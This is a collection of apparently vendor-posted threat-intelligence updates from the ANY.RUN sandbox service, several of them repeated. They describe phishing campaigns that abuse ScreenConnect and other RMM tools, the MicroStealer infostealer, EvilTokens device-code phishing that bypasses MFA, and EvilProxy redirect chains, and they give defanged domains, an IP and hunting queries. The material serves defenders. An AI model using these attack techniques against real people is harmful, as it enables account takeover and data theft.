A phishing attack starting from an Outlook email redirects victims to a fake Word Online / OneDrive page, leading to stealthy remote access under the guise of a document preview.

Instead of traditional malware loaders, the chain relies on legitimate tools to establish remote access while blending into normal corporate activity. This reduces visibility for traditional detection and increases the risk of delayed detection and prolonged attacker presence.

In ANYRUN Sandbox, analysts can observe high-value detection signals early in the execution chain, including suspicious document-delivery domains, silent software installation behavior, intermediate deployment stages, and utilities used to hide installed programs.

These artifacts help teams build detections around trusted-tool abuse, suspicious command-line behavior, and phishing infrastructure instead of relying only on file hashes.

Execution chain:

Outlook .eml ➡️ Word Online phishing page ➡️ MSI installer ➡️ Ninite /silent execution ➡️ Remote access via ScreenConnect ➡️ Activity concealment via HideUL 

See the full attack flow and collect IOCs to improve detection coverage.

Explore related activity and validate hunting patterns using this TI Lookup query: filePath:".eml" AND threatName:"phishing" AND (threatName:"^rat$" OR threatName:"^rmm-tool$")

https://preview.redd.it/p65u2m74vw0h1.png?width=1080&format=png&auto=webp&s=6e6d0000fa6d62a37f6ff433ab830c535639d256

A phishing attack starting from an Outlook email redirects victims to a fake Word Online / OneDrive page, leading to stealthy remote access under the guise of a document preview.

Instead of traditional malware loaders, the chain relies on legitimate tools to establish remote access while blending into normal corporate activity. This reduces visibility for traditional detection and increases the risk of delayed detection and prolonged attacker presence.

In ANYRUN Sandbox, analysts can observe high-value detection signals early in the execution chain, including suspicious document-delivery domains, silent software installation behavior, intermediate deployment stages, and utilities used to hide installed programs.

These artifacts help teams build detections around trusted-tool abuse, suspicious command-line behavior, and phishing infrastructure instead of relying only on file hashes.

Execution chain:

Outlook .eml ➡️ Word Online phishing page ➡️ MSI installer ➡️ Ninite /silent execution ➡️ Remote access via ScreenConnect ➡️ Activity concealment via HideUL 

See the full attack flow and collect IOCs to improve detection coverage.

Explore related activity and validate hunting patterns using this TI Lookup query: filePath:".eml" AND threatName:"phishing" AND (threatName:"^rat$" OR threatName:"^rmm-tool$")

Strengthen your SOC, detect complex threats faster, and boost team performance with ANYRUN.

https://preview.redd.it/8s68kooniw0h1.png?width=2250&format=png&auto=webp&s=48fa5545ce7ba3ffb078dc30ddbbf21861fc0972

Compromised accounts enable BEC, data exfiltration, and lateral movement, creating direct financial and operational risk. This campaign generates phishing pages directly inside the browser using blob objects instead of loading them over the network.

The payload exists entirely in memory, which breaks network visibility and makes traditional detection unreliable. 

ANY.RUN Sandbox exposed in-memory phishing, enabling faster detection and response. See how the attack unfolds

Explore full technical breakdown to understand detection gaps and validate your coverage.

https://preview.redd.it/4aivcc7uspzg1.png?width=2400&format=png&auto=webp&s=5f5657c2c46d4e39fc862d7e68385f43c5accb7d

Compromised accounts enable BEC, data exfiltration, and lateral movement, creating direct financial and operational risk.

This campaign generates phishing pages directly inside the browser using blob objects instead of loading them over the network. The payload exists entirely in memory, which breaks network visibility and makes traditional detection unreliable.

ANY.RUN Sandbox helps SOC teams observe this behavior, exposing in-memory phishing and enabling faster detection and response. See how the attack unfolds and collect IOCs

Explore full technical breakdown to understand detection gaps, validate your coverage, and strengthen phishing defenses.

https://preview.redd.it/wphik2zysizg1.png?width=2400&format=png&auto=webp&s=f0a8ffaac35ada5eba1c9a36519c42032767928c

A huge part of the queue ends up being noise, but analysts still have to spend time reviewing and triaging it. Over time, that affects everything: response speed, investigation quality and overall efficiency.

What makes it harder is that once the volume gets high enough, teams naturally start moving faster just to keep up. And that’s where important detections can get buried or downgraded.

What has made the biggest difference for your team when it comes to reducing unnecessary alerts?

Reaching a higher level of SOC maturity comes down to making better, more consistent decisions during malware and phishing investigations.

That requires rethinking how threat intelligence is used: not just as a reference, but as a core part of the decision-making process.

To move from reactive to confidently proactive security, you need a threat intelligence workflow that:

• addresses key challenges like alert fatigue and visibility gaps
• integrates seamlessly into SOC workflows and supports them
• delivers compounding value as part of a unified system

Learn how you can adopt behavioral TI to reduce MTTR and business risk: https://any.run/cybersecurity-blog/soc-maturity-with-threat-intelligence/

https://preview.redd.it/ture6c14p4zg1.png?width=2048&format=png&auto=webp&s=e1fef6f3b8d4990254ba59c5ccb3721230e5dda1

MicroStealer is a rapidly emerging infostealer that spreads quickly while maintaining low detection rates. It uses a sophisticated multi-stage delivery chain and exfiltrates data via Discord webhooks and attacker-controlled servers.

MicroStealer: Key Features

1. MicroStealer uses a layered NSIS → Electron → Java chain for evasion and rapid spread.
2. It steals more than passwords, focusing on browser sessions, cookies, screenshots, and wallets for immediate impact.
3. Low AV detection + redundant exfiltration (Discord + C2) enable quick, reliable data theft.
4. Session hijacking turns endpoint compromise into persistent enterprise access.
5. Behavior-based sandbox analysis is essential for early detection of emerging stealers.
6. Proactively defend with ANY.RUN's Threat Intelligence Lookup for instant IOC/variant hunting and Threat Intelligence Feeds for real-time campaign visibility and automated protection: threatName:"microstealer".

Read the full article to learn how to detect it early: https://any.run/malware-trends/microstealer/

Malware overview in TI Lookup: landscape, IOCs, and more

A large-scale campaign is targeting U.S. organizations with fake event invitations. Attackers combine credential theft with OTP interception and RMM deployment, enabling direct remote access.

Activity is concentrated in the U.S., with 𝗵𝗶𝗴𝗵 𝗿𝗶𝘀𝗸 𝗮𝗰𝗿𝗼𝘀𝘀 𝗯𝗮𝗻𝗸𝗶𝗻𝗴, 𝗴𝗼𝘃𝗲𝗿𝗻𝗺𝗲𝗻𝘁, 𝘁𝗲𝗰𝗵, 𝗮𝗻𝗱 𝗵𝗲𝗮𝗹𝘁𝗵𝗰𝗮𝗿𝗲, indicating broad exposure across business-critical sectors.

Some phishing pages show signs of AI-assisted generation, while embedded code reveals reuse of common phishing kits, allowing attackers to scale and rapidly create new lures.

The risk goes beyond phishing. 𝗥𝗲𝗺𝗼𝘁𝗲 𝗮𝗰𝗰𝗲𝘀𝘀 𝘁𝗼 𝘁𝗵𝗲 𝗰𝗼𝗿𝗽𝗼𝗿𝗮𝘁𝗲 𝗲𝗻𝘃𝗶𝗿𝗼𝗻𝗺𝗲𝗻𝘁 𝗶𝘀 𝗲𝘀𝘁𝗮𝗯𝗹𝗶𝘀𝗵𝗲𝗱 𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗹𝗲𝗴𝗶𝘁𝗶𝗺𝗮𝘁𝗲 𝘁𝗼𝗼𝗹𝘀 like ScreenConnect, ITarian, and Datto RMM, while infrastructure and domains are designed to look trustworthy, delaying detection and increasing attacker dwell time.

The flow starts with a CAPTCHA page, followed by a fake “event invitation” and then splits into two paths: credential harvesting via phishing login pages or RMM installation.
In this case, the download starts automatically, establishing access early in the execution chain, before user awareness. See how the full flow unfolds, from initial redirect to remote access delivery: https://app.any.run/tasks/4c2687da-1426-43c3-8e16-868f90fb9361/

Despite infrastructure changes, the campaign relies on repeatable patterns: consistent URL structure across phishing domains, fixed resource paths like /Image/*.png, and sequential requests such as /favicon.ico ➡️ /blocked.html ➡️ phishing content. 

Explore these patterns, uncover related activity, and pivot from IOCs in TI Lookup.

https://preview.redd.it/n8btt5lov6yg1.png?width=1080&format=png&auto=webp&s=4d8eb9638625a2abe3e2cc4eab9fc664efed53bc

https://preview.redd.it/kiwfn9kpv6yg1.png?width=1080&format=png&auto=webp&s=5c73dc5125e974a307b7bf3bcc48eff0119c2d59

A large-scale campaign is targeting U.S. organizations with fake event invitations. Attackers combine credential theft with OTP interception and RMM deployment, enabling direct remote access.

Activity is concentrated in the U.S., with 𝗵𝗶𝗴𝗵 𝗿𝗶𝘀𝗸 𝗮𝗰𝗿𝗼𝘀𝘀 𝗯𝗮𝗻𝗸𝗶𝗻𝗴, 𝗴𝗼𝘃𝗲𝗿𝗻𝗺𝗲𝗻𝘁, 𝘁𝗲𝗰𝗵, 𝗮𝗻𝗱 𝗵𝗲𝗮𝗹𝘁𝗵𝗰𝗮𝗿𝗲, indicating broad exposure across business-critical sectors.

Some phishing pages show signs of AI-assisted generation, while embedded code reveals reuse of common phishing kits, allowing attackers to scale and rapidly create new lures.

The risk goes beyond phishing. 𝗥𝗲𝗺𝗼𝘁𝗲 𝗮𝗰𝗰𝗲𝘀𝘀 𝘁𝗼 𝘁𝗵𝗲 𝗰𝗼𝗿𝗽𝗼𝗿𝗮𝘁𝗲 𝗲𝗻𝘃𝗶𝗿𝗼𝗻𝗺𝗲𝗻𝘁 𝗶𝘀 𝗲𝘀𝘁𝗮𝗯𝗹𝗶𝘀𝗵𝗲𝗱 𝘁𝗵𝗿𝗼𝘂𝗴𝗵 𝗹𝗲𝗴𝗶𝘁𝗶𝗺𝗮𝘁𝗲 𝘁𝗼𝗼𝗹𝘀 like ScreenConnect, ITarian, and Datto RMM, while infrastructure and domains are designed to look trustworthy, delaying detection and increasing attacker dwell time.

The flow starts with a CAPTCHA page, followed by a fake “event invitation” and then splits into two paths: credential harvesting via phishing login pages or RMM installation.
In this case, the download starts automatically, establishing access early in the execution chain, before user awareness. See how the full flow unfolds, from initial redirect to remote access delivery: https://app.any.run/tasks/4c2687da-1426-43c3-8e16-868f90fb9361/

With ANYRUN Sandbox and Threat Intelligence, analysts can safely reconstruct the full attack chain and identify related patterns across campaigns. This enables earlier confirmation of phishing activity, reduces MTTD, and helps contain incidents before impact.

Early-stage signals make this campaign detectable. These appear before credentials are entered and are visible in ANYRUN Sandbox at the start of the execution chain, enabling faster and more confident response decisions.

Despite infrastructure changes, the campaign relies on repeatable patterns: consistent URL structure across phishing domains, fixed resource paths like /Image/*.png, and sequential requests such as /favicon.ico ➡️ /blocked.html ➡️ phishing content. 

Explore these patterns, uncover related activity, and pivot from IOCs in TI Lookup.

https://preview.redd.it/2au4ubkgj5yg1.png?width=2400&format=png&auto=webp&s=0db84882cfa2b852bc9055617fdfd8645d0a00dc

https://preview.redd.it/9dp5iuchj5yg1.png?width=2400&format=png&auto=webp&s=3300c7b193164ddac23e9a4643ae24b1a8045e92

EvilTokens is a PhaaS toolkit that automates device code phishing attacks against Microsoft 365 and Entra ID environments. Unlike traditional credential-harvesting phishing, EvilTokens tricks users into completing legitimate authentication on Microsoft's own login pages, resulting in the issuance of valid OAuth access and refresh tokens directly to the attacker, effectively bypassing MFA without stealing passwords.

• As a PhaaS kit sold on Telegram, it democratizes sophisticated attacks, enabling rapid scaling with minimal technical skill.
• AI-powered features generate convincing lures and automate BEC, increasing both volume and success rates.
• Persistent refresh tokens allow long-term access, device registration, and silent authentication across M365 services.
• Organizations in finance, government, healthcare, and other M365-heavy sectors are prime targets globally.

 

Security teams can query ANYRUN's Threat Intelligence Lookup for known EvilTokens domains, URLs, and infrastructure indicators in real time: destinationIP:"75.98.162.49".

See the full article and analysis session: https://any.run/malware-trends/eviltokens/

Malicious IP linked to EvilTokens

Redirect chains, fake CAPTCHA, and fast-changing delivery paths make traditional detection unreliable. By the time credentials are targeted, the signal is already lost, which creates a critical gap in triage. The key is detecting phishing earlier, while patterns are still stable, before the flow fully unfolds.

Here are two examples showing how early-stage signals help identify phishing activity before it escalates:

1. 𝗥𝗲𝗱𝗶𝗿𝗲𝗰𝘁 𝗶𝗻𝗳𝗿𝗮𝘀𝘁𝗿𝘂𝗰𝘁𝘂𝗿𝗲

The chain starts from a Google link leading to a compromised site. A hidden HTML page extracts victim data from the URL fragment and triggers a redirect before any user interaction. Analysis session.

In TI Lookup, this activity can be traced by searching for URL fragments containing the #...Family= parameter, which is used to pass victim data and drive redirection. This helps uncover similar samples and track reuse across campaigns.

Use this query to pivot from this signal and uncover related activity.

2. 𝗙𝗮𝗸𝗲 𝗖𝗔𝗣𝗧𝗖𝗛𝗔 𝗱𝗲𝗹𝗶𝘃𝗲𝗿𝘆
   After the initial redirect, the victim is presented with a legit-looking CAPTCHA to build trust before being redirected to a phishing page, a fake Microsoft login page powered by EvilProxy. Analysis session.

Detection here relies on consistent URL parameters (v, session, cid, iat, loc, build) that appear early in the execution chain. Searching for this structure helps surface related signals and build early-stage detection, reducing MTTD, improving coverage and MTTR.

Use this query to surface related phishing activity and validate detection patterns.

𝗬𝗼𝘂 𝗰𝗮𝗻 𝗻𝗼𝘄 𝘁𝗲𝘀𝘁 𝗧𝗜’𝘀 𝗶𝗺𝗽𝗮𝗰𝘁 𝗼𝗻 𝘁𝗿𝗶𝗮𝗴𝗲, 𝗿𝗲𝘀𝗽𝗼𝗻𝘀𝗲, 𝗮𝗻𝗱 𝘁𝗵𝗿𝗲𝗮𝘁 𝗵𝘂𝗻𝘁𝗶𝗻𝗴 𝗱𝗶𝗿𝗲𝗰𝘁𝗹𝘆 𝗶𝗻 𝘆𝗼𝘂𝗿 𝘄𝗼𝗿𝗸𝗳𝗹𝗼𝘄𝘀. With 20 premium search requests available, SOC and MSSP teams can validate activity against real-world data, reduce uncertainty, and make faster, evidence-based decisions.

IOCs:
URL patterns:
hxxps://<redirector_site>/*#<8 digits>Family=<base64-victim email>
hxxps://<phishing_domain>/?v=<hexadec_chars>&session=<session_id>&cid=<client_id>&iat=<digits>&loc=<location_code>&build=<build_version>

Domains:
kjcleaningservices[.]com[.]au
starllamerchantservices[.]club
lavor[.]sbs
echosign[.]co[.]it
dspconsulting[.]eu

https://preview.redd.it/975761ajkzwg1.png?width=1080&format=png&auto=webp&s=17639d2d60919a8842888db32f37f580dc0e754b

Redirect chains, fake CAPTCHA, and fast-changing delivery paths make traditional detection unreliable. By the time credentials are targeted, the signal is already lost, which creates a critical gap in triage. The key is detecting phishing earlier, while patterns are still stable, before the flow fully unfolds.

With ANYRUN TI Lookup, teams can move from isolated indicators to full context, identify attack patterns, and validate detection logic against real attack data from 15K+ organizations.

Here are two examples showing how early-stage signals help identify phishing activity before it escalates:

1. 𝗥𝗲𝗱𝗶𝗿𝗲𝗰𝘁 𝗶𝗻𝗳𝗿𝗮𝘀𝘁𝗿𝘂𝗰𝘁𝘂𝗿𝗲

The chain starts from a Google link leading to a compromised site. A hidden HTML page extracts victim data from the URL fragment and triggers a redirect before any user interaction. Analysis session.

In TI Lookup, this activity can be traced by searching for URL fragments containing the #...Family= parameter, which is used to pass victim data and drive redirection. This helps uncover similar samples and track reuse across campaigns.

Use this query to pivot from this signal and uncover related activity.

2. 𝗙𝗮𝗸𝗲 𝗖𝗔𝗣𝗧𝗖𝗛𝗔 𝗱𝗲𝗹𝗶𝘃𝗲𝗿𝘆
   After the initial redirect, the victim is presented with a legit-looking CAPTCHA to build trust before being redirected to a phishing page, a fake Microsoft login page powered by EvilProxy. Analysis session.

Detection here relies on consistent URL parameters (v, session, cid, iat, loc, build) that appear early in the execution chain. Searching for this structure helps surface related signals and build early-stage detection, reducing MTTD, improving coverage and MTTR.

Use this query to surface related phishing activity and validate detection patterns.

𝗬𝗼𝘂 𝗰𝗮𝗻 𝗻𝗼𝘄 𝘁𝗲𝘀𝘁 𝗧𝗜’𝘀 𝗶𝗺𝗽𝗮𝗰𝘁 𝗼𝗻 𝘁𝗿𝗶𝗮𝗴𝗲, 𝗿𝗲𝘀𝗽𝗼𝗻𝘀𝗲, 𝗮𝗻𝗱 𝘁𝗵𝗿𝗲𝗮𝘁 𝗵𝘂𝗻𝘁𝗶𝗻𝗴 𝗱𝗶𝗿𝗲𝗰𝘁𝗹𝘆 𝗶𝗻 𝘆𝗼𝘂𝗿 𝘄𝗼𝗿𝗸𝗳𝗹𝗼𝘄𝘀. With 20 premium search requests available, SOC and MSSP teams can validate activity against real-world data, reduce uncertainty, and make faster, evidence-based decisions.

https://preview.redd.it/vvvkawa4txwg1.png?width=2400&format=png&auto=webp&s=fbb5514c9e41f6c7ca48bff365e8347cd02e69c4

90% of attacks start with phishing. For CISOs, the real challenge begins when the SOC can’t quickly determine whether an alert is just noise or the start of credential theft, account takeover, malware delivery, or broader business disruption.

Today’s phishing is more disruptive because campaigns combine multiple techniques at once. It’s no longer a single email with a malicious link. Security teams now face layered attack flows that can include:

• redirect chains that hide the real destination
• QR codes that bypass traditional inspection
• CAPTCHAs that slow or block analysis
• AI-generated lures and deepfake content that increase credibility

Here are 3 steps to strengthen phishing detection across your environment: https://any.run/cybersecurity-blog/phishing-detection-steps-for-cisos/

Numbers proving the danger of modern phishing attacks